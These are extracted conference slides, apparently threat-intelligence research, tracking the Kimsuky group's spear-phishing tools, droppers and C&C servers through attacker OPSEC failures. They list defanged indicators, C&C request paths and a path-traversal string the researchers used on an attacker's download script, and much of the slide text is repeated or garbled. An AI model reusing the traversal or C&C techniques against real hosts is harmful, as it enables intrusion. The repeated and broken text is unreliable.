## Kimsuky Group : Track the King of the Spear-Phishing

###### 2019.10.04

 Jaeki Kim,

 Kyoung-Ju Kwak,

 Min-Chang Jang


-----

###### § JAEKI KIM (a.k.a JACK2)

 § Malware & Threat Analysis

 § Computer Emergency Analysis Team @FSI (2016~ )

 § Main Author of Threat Intelligence Report ‘Campaign DOKKAEBI’

 § Speaker of DOKKAEBI: Documents of Korean and Evil Binary @VB2018

 § Digital Forensic

 § CECRC @NEC(National Election Commission) (2016)

 § M.S. degree - Information Security

 § SANE Lab, Korea University (2014 ~ 2016)

 § Interest in Analysis

 § Mentor of Best of the Best(B.O.B) Program
 (Vulnerability Analysis Track) @KITRI

 § Member of “KOREANBADASS”, “SeoulPlusBadass” Team
 @DEFCON CTF Finalist (2017, 2018, 2019)
 § SNS(facebook,twitter) @2runjack2


-----

###### § Kyoung-ju KWAK

 § Manager of FSI Threat Analysis Team (~Jan.2019)

 § Manager of FSI Security Operations Center (Current)

 § Adjunct Professor, Department of Forensics,

 @SungKyunKwan University

 § Main Author of Threat Intelligence Report

 “Campaign Rifle : Andariel, The Maiden of Anguish”

 § Member of National Police Agency Cybercrime Advisory Committee

 § Speaker of {Blackhat, Kaspersky SAS, Kaspersky CSW

, PACSEC, HITCON, HACKCON, ISCR, etc}

 § SNS(facebook,twitter) @kjkwak12


-----

###### ▪ Min-Chang Jang (a.k.a OSIRIS)

 A manager of CEAT
 Computer Emergency Analysis Team @FSI (2014~ ) Main Author of Threat Intelligence Report ‘Shadow Voice’

 A graduate student (M.S degree)
 SANE Lab, Korea University (2014 ~ Now)

 Served in the Korea NAVY CERT

 Interest in Extreme Sports

 Speaker of {BlackHat Europe & Asia, KIMCHI CON, CODE BLUE} SNS (fb: mins4416, twt: 051R15)


-----

###### ▪ Threat Intelligence Report

 http://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataList.do

 ANDARIEL (2017.07), DOKKAEBI(2018.08), ShadowVoice (2018.12)


-----

#### § Introduction

 § Related Cases

 § Toolset characteristics

 § Tracking Malware & Monitoring C&C

 § Relationships

 § Recent Trends

 § Conclusion


-----

#### § Introduction

 § Related Cases

 § Toolset characteristics

 § Tracking Malware & Monitoring C&C

 § Relationships

 § Recent Trends

 § Conclusion


-----

###### § JAEKI KIM (a.k.a JACK2)

 § Malware & Threat Analysis

 § Computer Emergency Analysis Team @FSI (2016~ )

 § Main Author of Threat Intelligence Report ‘Campaign DOKKAEBI’

 § Speaker of DOKKAEBI: Documents of Korean and Evil Binary @VB2018

 § Digital Forensic

 § CECRC @NEC(National Election Commission) (2016)

 § M.S. degree - Information Security

 § SANE Lab, Korea University (2014 ~ 2016)

 § Interest in Analysis

 § Mentor of Best of the Best(B.O.B) Program
 (Vulnerability Analysis Track) @KITRI

 § Member of “KOREANBADASS”, “SeoulPlusBadass” Team
 @DEFCON CTF Finalist (2017, 2018, 2019)
 § SNS(facebook,twitter) @2runjack2


-----

### DOKKAEBI: Documents of Korean and Evil Binary

###### 2018.10.03

 Jaeki Kim,

 Kyoung-Ju Kwak,

 Min-Chang Jang


-----

###### § Campaign DOKKAEBI

 § A set of Operation carried out by Threat Groups 

 § using malicious Hangul documents for some particular
 purpose

 § Related Threat Groups

 § Bluenoroff, Kimsuky, Scarcruft


###### § Ddddddd

 § Dddddddd


###### Hangul documents and § Ddddd
 dropped(downloaded)
 § dmalware

 => Documents Of Korean


###### Campaign DOKKAEBI


###### Bluenoroff Kimsuky Scarcruft


-----

##### § Related Threat Groups

|§ Rela|ated Threat Group|ps|Col4|Col5|
|---|---|---|---|---|
|Threat Group|Target|Purpose|Activity Time|Major Incident|
|Bluenoroff|Global and Korean domestic financial companies Officials and users of crypto-currency exchanges|Confidential information takeover and monetary gain (SWIFT, crypto- currency)|2015 ~|SWIFT illegal transaction of central bank of Bangladesh|
|Kimsuky|Infrastructure, Government, North Korean defectors and politicians|Information gathering and social confusion|2013 ~|KHNP cyber terrorism (2014)|
|Scarcruft|Diplomatic and North Korean Human Rights Organizations and People|Information gathering and information destruction purposes|2016 ~|Attack using Flash Zero Day (CVE-2016-4171, CVE-2018-4878)|


-----

##### § Related Threat Groups

|§ Rela|ated Threat Group|ps|Col4|Col5|
|---|---|---|---|---|
|Threat Group|Target|Purpose|Activity Time|Major Incident|
|Kimsuky|Infrastructure, Government, North Korean defectors and politicians|Information gathering and social confusion|2013 ~|KHNP cyber terrorism (2014)|


-----

##### § Kimsuky Group

 § The kimsuky operation: a north korean apt?

 (Kaspersky, 2013.09)


-----

##### § Kimsuky Group

 § The kimsuky operation: a north korean apt?

 (Kaspersky, 2013.09)

 § KHNP (Korea Hydro & Nuclear Power)

 cyber terrorism attacks (2014.12)


-----

##### § Kimsuky Group

 § The kimsuky operation: a north korean apt?

 (Kaspersky, 2013.09)

 § KHNP (Korea Hydro & Nuclear Power)

 cyber terrorism attacks (2014.12)

 § Still active as of 2019


-----

#### § Introduction

 § Related Cases

 § Toolset characteristics

 § Tracking Malware & Monitoring C&C

 § Relationships

 § Recent Trends

 § Conclusion


-----

##### § 2019.01. ~


-----

##### § Known as Variously Operations

###### § Cobra Vennom, Kitty Phishing, Kabar Cobra …

Reference : https://blog alyac co kr/2066


-----

#### § Introduction

 § Related Cases

 § Toolset characteristics

 § Tracking Malware & Monitoring C&C

 § Relationships

 § Recent Trends

 § Conclusion


-----

##### § Server-side Toolkits & Malware


-----

##### § Server-side Toolkits (for Spear-Phishing)

###### § 1) Mailer – shape

 § 2) Mailer – core

 § 3) Beaconer

 § 4) Phisher

 § 5) Logger


-----

##### § Server-side Toolkits (for Spear-Phishing)

###### § 1) Mailer – shape

 § 2) Mailer - core

 § 3) Beaconer

 § 4) Phisher

 § 5) Logger


-----

###### § 2) Mailer – core

 § 3) Beaconer

 § 4) Phisher

 § 5) Logger


-----

##### § Server-side Toolkits (for Spear-Phishing)

###### § 1) Mailer - shape

 § 2) Mailer - core

 § 3) Beaconer

 § 4) Phisher

 § 5) Logger


-----

###### 1) Mailer - shape


-----

##### § Server-side (for Spear-Phishing)


###### § 4) Phisher

 § 5) Logger


-----

###### § 4) Phisher

 § 5) Logger


-----

##### § Malware

###### § 6) Dropper – Malicious HWP Documents

 § 7) Dropper – Camouflaged HWP Documents

 § 8) Script

 § 9) Info Stealer


-----

##### § Malware

###### § Full Image:


-----

##### § Malware


###### § 7) Dropper – Camouflaged HWP


-----

##### § Malware

###### § 9) Info Stealer


-----

###### Name No. Type (Tag) Contents
 Mailer (shape)§ Toolsets1 Mailer Mailer (just shape)
 Mailer (actual function)
 Mailer (core) 2 Mailer 1) Attachment malware
 2) Link to phishing page for account takeover


###### Beaconer 3 Web-Beacon Beacon to check whether mail is being viewed


###### Phishing Toolkit(lod) Phishing Page
 for Account Steal


###### Logging Logger 5 Logging for Phishing Target Information Phishing

 Dropper Malicious HWP 6 Malicious HWP Documets Sprear-Phishing

 Dropper Camouflaged HWP 7 Camouflaged HWP Documents (Ex. sfx, exe ...) Sprear-Phishing


###### Download additional malware and logging
 (Ex. *.vbs, *.wsf, *.jse, *.ps1)

|§ Toolset Mailer (shape)|ts 1|Mailer|
|---|---|---|
|Mailer (core)|2|Mailer|
|Beaconer|3|Web-Beacon|
|Phisher|4|Account Stealer Phishing|
|Logger|5|Logging Phishing|
|Malicious HWP|6|Dropper Sprear-Phishing|
|Camouflaged HWP|7|Dropper Sprear-Phishing|
|Script|8|Downloader Logging|


###### Steal Information of Infected Target
 d l d ddi i l l


###### f l


###### C&C / DLL / FTP
 l d


-----

#### § Introduction

 § Related Cases

 § Toolset characteristics

 § Tracking Malware & Monitoring C&C

 § Relationships

 § Recent Trends

 § Conclusion


-----

### g g


##### § Focus


-----

### g g

##### § Focus

###### § Attacker


-----

### g g

##### § Focus

###### § Attacker != Defender


-----

### g g

##### § Focus

###### § Attacker != Defender


-----

### g g

##### § Focus

###### § Attacker != Defender : OPSEC FAIL


-----

### g g

##### § OPSEC FAIL CASES

###### § 1) Directory Listing

 § 2) Leaked FTP Access Information

 § 3) File Download vulnerability


-----

### g g

##### § OPSEC FAIL CASES

###### § 1) Directory Listing


-----

### g g

##### § [CASE 1-1] Directory Listing – HWP Malware

 § After “Campaign DOKKAEBI” (H-DS type)


-----

###### Name No. Type (Tag) Contents
 Mailer (shape)§ Toolsets1 Mailer Mailer (just shape)
 Mailer (actual function)
 Mailer (core) 2 Mailer 1) Attachment malware
 2) Link to phishing page for account takeover


###### Beaconer 3 Web-Beacon Beacon to check whether mail is being viewed


###### Phishing Toolkit(lod) Phishing Page
 for Account Steal


###### Logging Logger 5 Logging for Phishing Target Information Phishing

 Dropper Malicious HWP 6 Malicious HWP Documets Sprear-Phishing

 Dropper Camouflaged HWP 7 Camouflaged HWP Documents (Ex. sfx, exe ...) Sprear-Phishing


###### Download additional malware and logging
 (Ex. *.vbs, *.wsf, *.jse, *.ps1)

|§ Toolset Mailer (shape)|ts 1|Mailer|
|---|---|---|
|Mailer (core)|2|Mailer|
|Beaconer|3|Web-Beacon|
|Phisher|4|Account Stealer Phishing|
|Logger|5|Logging Phishing|
|Malicious HWP|6|Dropper Sprear-Phishing|
|Camouflaged HWP|7|Dropper Sprear-Phishing|
|Script|8|Downloader Logging|


###### Steal Information of Infected Target
 d l d ddi i l l


###### f l


###### C&C / DLL / FTP
 l d


-----

###### Name No. Type (Tag) Contents
 Mailer (shape)§ Toolsets1 Mailer Mailer (just shape)
 Mailer (actual function)
 Mailer (core) 2 Mailer 1) Attachment malware
 2) Link to phishing page for account takeover


###### Beaconer 3 Web-Beacon Beacon to check whether mail is being viewed


###### Phishing Toolkit(lod) Phishing Page
 for Account Steal


###### Logging Logger 5 Logging for Phishing Target Information Phishing

 Dropper Malicious HWP 6 Malicious HWP Documets Sprear-Phishing

 Dropper Camouflaged HWP 7 Camouflaged HWP Documents (Ex. sfx, exe ...) Sprear-Phishing


###### Download additional malware and logging
 (Ex. *.vbs, *.wsf, *.jse, *.ps1)

|§ Toolset Mailer (shape)|ts 1|Mailer|
|---|---|---|
|Mailer (core)|2|Mailer|
|Beaconer|3|Web-Beacon|
|Phisher|4|Account Stealer Phishing|
|Logger|5|Logging Phishing|
|Malicious HWP|6|Dropper Sprear-Phishing|
|Camouflaged HWP|7|Dropper Sprear-Phishing|
|Script|8|Downloader Logging|


###### Steal Information of Infected Target
 d l d ddi i l l


###### f l


###### C&C / DLL / FTP
 l d


-----

### g g

##### § [CASE 1-1] Directory Listing – HWP Malware


-----

### g g

##### § [CASE 1-1] Directory Listing – HWP Malware

###### § Process Hollowing : notepad.exe

 § core.dll (4de21c3af64b3b605446278de92dfff4)

 § DLL Name : OneDll.dll

 § Export Function Name : DllRegisterServer


-----

### g g C&C
##### § [CASE 1-1] Directory Listing – HWP Malware

###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

### g g C&C
##### § [CASE 1-1] Directory Listing – HWP Malware

###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

### g g

##### § Like Sherlock Holmes …


###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

##### § [CASE 1-1] Directory Listing – HWP Malware

###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

### g g

##### § C&C - Tracking/Monitoring

###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

### g g

##### § C&C - Tracking/Monitoring (18.07.10., D+49)

###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

### g g

##### § C&C - Tracking/Monitoring (18.07.10., D+49)

###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

### g g

##### § C&C - Tracking/Monitoring (18.07.13., D+52)

###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

### g g

##### § C&C - Tracking/Monitoring (18.07.13., D+52)

###### § zerobase (53ac231e8091abcd0978124f9268b4e4)

 § XOR : 0x09FD8477


-----

### g g

##### § C&C - Tracking/Monitoring (18.07.13., D+52)

###### § zerobase_xor_09FD8477

 (MD5: 8b59ea1ee28e0123da82801abc0cce4d)

 § DLL Name : HanyangUpload_script.dll

 § Build Time : 2018.07.12. 08:25:45


-----

### g g

##### § C&C - Tracking/Monitoring (18.07.13., D+52)

###### § HanyangUpload_script.dll – GetName

 § 1) Get Computer Information (Mac Address, Volume)


-----

### g g

##### § C&C - Tracking/Monitoring (18.07.13., D+52)

###### § HanyangUpload_script.dll – GetName

 § 2) Scan Specific Files


-----

### g g

##### § C&C - Tracking/Monitoring (18.07.13., D+52)

###### § HanyangUpload_script.dll – GetName

 § 2) Scan Specific Files


-----

### g g

##### § C&C - Tracking/Monitoring (18.07.13., D+52)

###### § HanyangUpload_script.dll – GetName

 § 3) C&C


-----

### g g


##### § C&C - Tracking/Monitoring (18.07.13., D+52)

###### § HanyangUpload_script.dll – GetName

 § 3) C&C


-----

### g g


##### § C&C - Tracking/Monitoring (18.07.13., D+52)

###### § HanyangUpload_script.dll – GetName

 § 3) C&C : www.military[.]co.kr (211.202.2[.]51, KR)


-----

### g g

##### § C&C - Tracking/Monitoring (18.07.13., D+52)

###### § HanyangUpload_script.dll – GetName

 § 3) C&C : www.military[.]co.kr (211.202.2[.]51, KR)


-----

### g g

##### § [CASE 1-2] Camouflaged as HWP documents


-----

###### Name No. Type (Tag) Contents
 Mailer (shape)§ Toolsets1 Mailer Mailer (just shape)
 Mailer (actual function)
 Mailer (core) 2 Mailer 1) Attachment malware
 2) Link to phishing page for account takeover


###### Beaconer 3 Web-Beacon Beacon to check whether mail is being viewed


###### Phishing Toolkit(lod) Phishing Page
 for Account Steal


###### Logging Logger 5 Logging for Phishing Target Information Phishing

 Dropper Malicious HWP 6 Malicious HWP Documets Sprear-Phishing

 Dropper Camouflaged HWP 7 Camouflaged HWP Documents (Ex. sfx, exe ...) Sprear-Phishing


###### Download additional malware and logging
 (Ex. *.vbs, *.wsf, *.jse, *.ps1)

|§ Toolset Mailer (shape)|ts 1|Mailer|
|---|---|---|
|Mailer (core)|2|Mailer|
|Beaconer|3|Web-Beacon|
|Phisher|4|Account Stealer Phishing|
|Logger|5|Logging Phishing|
|Malicious HWP|6|Dropper Sprear-Phishing|
|Camouflaged HWP|7|Dropper Sprear-Phishing|
|Script|8|Downloader Logging|


###### Steal Information of Infected Target
 d l d ddi i l l


###### f l


###### C&C / DLL / FTP
 l d


-----

###### Name No. Type (Tag) Contents
 Mailer (shape)§ Toolsets1 Mailer Mailer (just shape)
 Mailer (actual function)
 Mailer (core) 2 Mailer 1) Attachment malware
 2) Link to phishing page for account takeover


###### Beaconer 3 Web-Beacon Beacon to check whether mail is being viewed


###### Phishing Toolkit(lod) Phishing Page
 for Account Steal


###### Logging Logger 5 Logging for Phishing Target Information Phishing

 Dropper Malicious HWP 6 Malicious HWP Documets Sprear-Phishing

 Dropper Camouflaged HWP 7 Camouflaged HWP Documents (Ex. sfx, exe ...) Sprear-Phishing


###### Download additional malware and logging
 (Ex. *.vbs, *.wsf, *.jse, *.ps1)

|§ Toolset Mailer (shape)|ts 1|Mailer|
|---|---|---|
|Mailer (core)|2|Mailer|
|Beaconer|3|Web-Beacon|
|Phisher|4|Account Stealer Phishing|
|Logger|5|Logging Phishing|
|Malicious HWP|6|Dropper Sprear-Phishing|
|Camouflaged HWP|7|Dropper Sprear-Phishing|
|Script|8|Downloader Logging|


###### Steal Information of Infected Target
 d l d ddi i l l


###### f l


###### C&C / DLL / FTP
 l d


-----

### g g

##### § [CASE 1-2] Camouflaged as HWP documents

###### § SFX


-----

### g g

##### § [CASE 1-2] Camouflaged as HWP documents

###### § Flow


-----

### g g

##### § [CASE 1-2] Camouflaged as HWP documents

###### § Powershell – Set Registry

 § Path: \Windows\CurrentVersion\Screensavers

 § Name: ScreenRibbonsDomain

 § Value: primary-help.esy.es


-----

### g g

##### § [CASE 1-2] Camouflaged as HWP documents


###### § Powershell – Download malware and Execute


-----

###### § 5) Powershell – Download

 § Path: \Windows\CurrentVersion\Screensavers

 § Name: ScreenRibbonsDomain

 § Value: primary-help.esy.es

 § S

 § Ddddddd

 § Dddddddd

 § Ddddd


-----

### g g

##### § [CASE 1-2] Camouflaged as HWP documents

###### § Return! (2019.04.01.)


-----

### g g

##### § [CASE 1-2] Camouflaged as HWP documents

###### § Return! (2019.04.01.)


-----

### g g

##### § [CASE 1-2] Camouflaged as HWP documents

###### § Return! (2019.04.01.)

 § Directory Listing à Mailer +_+


-----

### g g

##### § [CASE 1-2] Camouflaged as HWP documents

###### § Return! (2019.04.01.)

 § Mailer – shape & core


##### § [CASE 1-2] Camouflaged as HWP documents

###### § Return! (2019.04.01.)


-----

### g g


##### [CASE 1-2] Camouflaged as HWP documents


-----

### g g


###### § Mailer – shape & core


##### § [CASE 1-2] Camouflaged as HWP documents

###### § Return! (2019.04.01.)


-----

### g g

##### § [CASE 1-2] Camouflaged as HWP documents

###### § Self-Testing

 using My Email


-----

### g g

##### § [CASE 1-2] Camouflaged as HWP documents

###### § Self-Testing

 using My Email

 => Sending normally


-----

### g g


-----

### g g

##### § [CASE 1-2] Camouflaged as HWP documents

###### § Check Email

 § Attachment from Daum : 시사회.zip (시사회.vbs)

 § Web Beacon : hxxp://[C&C]/_log/reading.php?uid=[E-mail]


-----

### g g

##### § OPSEC FAIL CASES

###### § 1) Directory Listing

 => Detect New Malware & Mailer


-----

### g g

##### § OPSEC FAIL CASES

###### § 1) Directory Listing : Detect New Malware & Mailer

 § 2) Leaked FTP Access Information


-----

###### Name No. Type (Tag) Contents
 Mailer (shape)§ Toolsets1 Mailer Mailer (just shape)
 Mailer (actual function)
 Mailer (core) 2 Mailer 1) Attachment malware
 2) Link to phishing page for account takeover


###### Beaconer 3 Web-Beacon Beacon to check whether mail is being viewed


###### Phishing Toolkit(lod) Phishing Page
 for Account Steal


###### Logging Logger 5 Logging for Phishing Target Information Phishing

 Dropper Malicious HWP 6 Malicious HWP Documets Sprear-Phishing

 Dropper Camouflaged HWP 7 Camouflaged HWP Documents (Ex. sfx, exe ...) Sprear-Phishing


###### Download additional malware and logging
 (Ex. *.vbs, *.wsf, *.jse, *.ps1)

|§ Toolset Mailer (shape)|ts 1|Mailer|
|---|---|---|
|Mailer (core)|2|Mailer|
|Beaconer|3|Web-Beacon|
|Phisher|4|Account Stealer Phishing|
|Logger|5|Logging Phishing|
|Malicious HWP|6|Dropper Sprear-Phishing|
|Camouflaged HWP|7|Dropper Sprear-Phishing|
|Script|8|Downloader Logging|


###### Steal Information of Infected Target
 d l d ddi i l l


###### f l


###### C&C / DLL / FTP
 l d


-----

###### Name No. Type (Tag) Contents
 Mailer (shape)§ Toolsets1 Mailer Mailer (just shape)
 Mailer (actual function)
 Mailer (core) 2 Mailer 1) Attachment malware
 2) Link to phishing page for account takeover


###### Beaconer 3 Web-Beacon Beacon to check whether mail is being viewed


###### Phishing Toolkit(lod) Phishing Page
 for Account Steal


###### Logging Logger 5 Logging for Phishing Target Information Phishing

 Dropper Malicious HWP 6 Malicious HWP Documets Sprear-Phishing

 Dropper Camouflaged HWP 7 Camouflaged HWP Documents (Ex. sfx, exe ...) Sprear-Phishing


###### Download additional malware and logging
 (Ex. *.vbs, *.wsf, *.jse, *.ps1)

|§ Toolset Mailer (shape)|ts 1|Mailer|
|---|---|---|
|Mailer (core)|2|Mailer|
|Beaconer|3|Web-Beacon|
|Phisher|4|Account Stealer Phishing|
|Logger|5|Logging Phishing|
|Malicious HWP|6|Dropper Sprear-Phishing|
|Camouflaged HWP|7|Dropper Sprear-Phishing|
|Script|8|Downloader Logging|


###### Steal Information of Infected Target
 d l d ddi i l l


###### f l


###### C&C / DLL / FTP
 l d


-----

### g g

##### § [CASE 2] Leaked FTP Access Information

 § Malicious Script (Delivered-Email.wsf)


-----

### g g

##### § [CASE 2] Leaked FTP Access Information

 § Malicious Script (Delivered-Email.wsf)

###### § 1) Additional Malware download from C&C


###### § 2) Open Email (Normal file)

 § 3) Execute Malware (Info Stealer)

 § 4) FTP Upload


-----

### g g

##### § [CASE 2] Leaked FTP Access Information

 § Malicious Script (Delivered-Email.wsf)

###### § 1) Additional Malware download from C&C

 § 2) Open Email (Normal Email)


###### § 3) Execute Malware (Info Stealer)

 § 4) FTP Upload


-----

### g g

##### § [CASE 2] Leaked FTP Access Information

 § Malicious Script (Delivered-Email.wsf)

###### § 1) Additional Malware download from C&C

 § 2) Open Email (Normal file)

 § 3) Execute Malware (Info Stealer)


###### § 4) FTP Upload


-----

### g g

##### § [CASE 2] Leaked FTP Access Information

 § Malicious Script (Delivered-Email.wsf)

###### § 1) Additional Malware download from C&C

 § 2) Open Email (Normal file)

 § 3) Execute Malware (Info Stealer)

 § 4) FTP Upload


-----

### g g

##### § [CASE 2] Leaked FTP Access Information


-----

### g g

##### § [CASE 2] Leaked FTP Access Information

 § C&C : FTP Upload

###### § Free Hosting Service (Hostinger)

 § Compromised website in South Korea

 § Love victory & rhdwn (공주-> princess)


-----

### g g

##### § [CASE 2] Leaked FTP Access Information

 § OPSEC FAIL!

###### § 4) FTP Upload


-----

### g g

##### § [CASE 2] Leaked FTP Access Information


-----

### g g

##### § [CASE 2] Leaked FTP Access Information


-----

### g g

##### § [CASE 2] Leaked FTP Access Information

 § Free Hosting Service (Hostinger)

###### § Love victory & rhdwn (공주-> princess)


-----

### g g

##### § [CASE 2] Leaked FTP Access Information

 § Free Hosting Service (Hostinger)

###### § Love victory -> Webshell Password


-----

### g g

##### § OPSEC FAIL CASES

###### § 1) Directory Listing : Detect New Malware & Mailer

 § 2) Leaked FTP Access Information

 => Get Server-side toolkit


-----

### g g

##### § OPSEC FAIL CASES

###### § 1) Directory Listing : Detect New Malware & Mailer

 § 2) Leaked FTP Access Information : Get Server toolkit

 § 3) File Download vulnerability


-----

###### Name No. Type (Tag) Contents
 Mailer (shape)§ Toolsets1 Mailer Mailer (just shape)
 Mailer (actual function)
 Mailer (core) 2 Mailer 1) Attachment malware
 2) Link to phishing page for account takeover


###### Beaconer 3 Web-Beacon Beacon to check whether mail is being viewed


###### Phishing Toolkit(lod) Phishing Page
 for Account Steal


###### Logging Logger 5 Logging for Phishing Target Information Phishing

 Dropper Malicious HWP 6 Malicious HWP Documets Sprear-Phishing

 Dropper Camouflaged HWP 7 Camouflaged HWP Documents (Ex. sfx, exe ...) Sprear-Phishing


###### Download additional malware and logging
 (Ex. *.vbs, *.wsf, *.jse, *.ps1)

|§ Toolset Mailer (shape)|ts 1|Mailer|
|---|---|---|
|Mailer (core)|2|Mailer|
|Beaconer|3|Web-Beacon|
|Phisher|4|Account Stealer Phishing|
|Logger|5|Logging Phishing|
|Malicious HWP|6|Dropper Sprear-Phishing|
|Camouflaged HWP|7|Dropper Sprear-Phishing|
|Script|8|Downloader Logging|


###### Steal Information of Infected Target
 d l d ddi i l l


###### f l


###### C&C / DLL / FTP
 l d


-----

###### Name No. Type (Tag) Contents
 Mailer (shape)§ Toolsets1 Mailer Mailer (just shape)
 Mailer (actual function)
 Mailer (core) 2 Mailer 1) Attachment malware
 2) Link to phishing page for account takeover


###### Beaconer 3 Web-Beacon Beacon to check whether mail is being viewed


###### Phishing Toolkit(lod) Phishing Page
 for Account Steal


###### Logging Logger 5 Logging for Phishing Target Information Phishing

 Dropper Malicious HWP 6 Malicious HWP Documets Sprear-Phishing

 Dropper Camouflaged HWP 7 Camouflaged HWP Documents (Ex. sfx, exe ...) Sprear-Phishing


###### Download additional malware and logging
 (Ex. *.vbs, *.wsf, *.jse, *.ps1)

|§ Toolset Mailer (shape)|ts 1|Mailer|
|---|---|---|
|Mailer (core)|2|Mailer|
|Beaconer|3|Web-Beacon|
|Phisher|4|Account Stealer Phishing|
|Logger|5|Logging Phishing|
|Malicious HWP|6|Dropper Sprear-Phishing|
|Camouflaged HWP|7|Dropper Sprear-Phishing|
|Script|8|Downloader Logging|


###### Steal Information of Infected Target
 d l d ddi i l l


###### f l


###### C&C / DLL / FTP
 l d


-----

### g g

##### § [CASE 3] File Download vulnerability

 § EML – HWP Attachment


-----

### g g

##### § [CASE 3] File Download vulnerability

 § EML – HWP Attachment

###### § Distribution Server : member-authorize[.]com


-----

### g g

##### § [CASE 3] File Download vulnerability

 § EML – HWP Attachment

###### § Distribution Server : member-authorize[.]com


-----

### g g

##### § [CASE 3] File Download vulnerability

 § 1) HWP

###### § EPS(Encapsulated Postscript),

 Summary Information (X)


-----

### g g

##### § [CASE 3] File Download vulnerability

 § 2) Powershell

###### § Get Malicious Script from ddlove[.]kr


-----

### g g

##### § [CASE 3] File Download vulnerability

 § 3) 1.wsf

###### § (a) Set var

 § (b) Check Extract Util – WinRAR / ALZip

 § (c) Check Response

 § (d) Save File & Extract

 § (e) or Save File & Decoding

 § (f) Execute file


-----

### g g

##### [CASE 3] File Download vulnerability

 3) 1.wsf

###### § (a) Set var

 § (b) Check Extract Util – WinRAR / ALZip

 § (c) Check Response

 § (d) Save File & Extract

 § (e) or Save File & Decoding

 § (f) Execute file


##### § [CASE 3] File Download vulnerability

 § 3) 1.wsf

###### § (a) Set var

 § (b) Check Extract Util – WinRAR / ALZip


-----

### g g

##### § [CASE 3] File Download vulnerability

 § 4) Freedom.dll

###### § Timestamp : Tue Jan 08 09:02:00 2019

 § Export : GrapHouse

 § Check Env (32/64)

 § 64bit : /bbs/data/font/exts.fmt

 § Process Hollwing (explorer.exe)

 § [SND]: /register.php?
 WORD=com_XXXXXXXX&NOTE=

 § [GET]: /bbs/data/ariaK[T]_XXXXXXXX

 § [DEL]: /join.php?file=


-----

###### § 64bit : /bbs/data/font/exts.fmt

 § Process Hollwing (explorer.exe)

 § [SND]: /register.php?
 WORD=com_XXXXXXXX&NOTE=

 § [GET]: /bbs/data/ariaK[T]_XXXXXXXX

 § [DEL]: /join.php?file=


##### § [CASE 3] File Download vulnerability

 § 4) Freedom.dll

###### § Timestamp : Tue Jan 08 09:02:00 2019

 § Export : GrapHouse

 § Check Env (32/64)

 § 64bit : /bbs/data/font/exts.fmt


-----

##### § [CASE 3] File Download vulnerability

 § 4) Freedom.dll

###### § Timestamp : Tue Jan 08 09:02:00 2019

 § Export : GrapHouse

 § Check Env (32/64)

 § 64bit : /bbs/data/font/exts.fmt

 § Process Hollwing (explorer.exe)

 § [SND]: /register.php?
 WORD=com_XXXXXXXX&NOTE=


###### § [GET]: /bbs/data/ariaK[T]_XXXXXXXX

 § [DEL]: /join.php?file=


-----

### g g

##### § [CASE 3] File Download vulnerability

 § EML – HWP Attachment

###### § Distribution Server : member-authorize[.]com


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing (OPSEC FAIL – CASE #01)

###### § /security/downloads


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing (OPSEC FAIL – CASE #01)

###### § /security/downloads/download.php


-----

### g g

##### § Like Sherlock Holmes … again


###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Try to File download

###### § /security/downloads/download.php

 ?fileName=dowonload.php


-----

### g g

##### § [CASE 3] File Download vulnerability


##### § Try to file download

###### § /security/downloads/download.php

 ?fileName=dowonload.php


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing + File download

###### § ../../../../../../../home/u385698457/public_html/


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing + File download

###### § ../../../../../../../home/u385698457/public_html/


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing + File download

###### § ../../../../../../../home/u385698457/public_html/


-----

### g g


##### [CASE 3] File Download vulnerability

 download

###### ../../../../../../../home/u385698457/public_html/


-----

### g g


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing + File download

###### § ../../../../../../../home/u385698457/public_html/


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing + File download

###### § github.com/ostoc/http2_php/miniProxy.php


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing + File download

###### § /security/mailer


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing + File download

###### § /security/mailer


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing + File download

###### § /security/mailer


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing + File download

###### § /security/mailer


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing + File download

###### § /security/mailer


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing + File download

###### § 1) mail.php


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing + File download

###### § 2) mail_ok.php - attachFileName


-----

### g g

##### § [CASE 3] File Download vulnerability

 § Directory Listing + File download

###### § 2) mail_ok.php – Phishing (Previous)


-----

#### § Introduction

 § Related Cases

 § Toolset characteristics

 § Tracking Malware & Monitoring C&C

 § Relationships

 § Recent Trends

 § Conclusion


-----

### p

##### § Like Sherlock Holmes …


###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

 § C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)


-----

##### § [CASE 1-1] Directory Listing – HWP Malware

###### § fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)

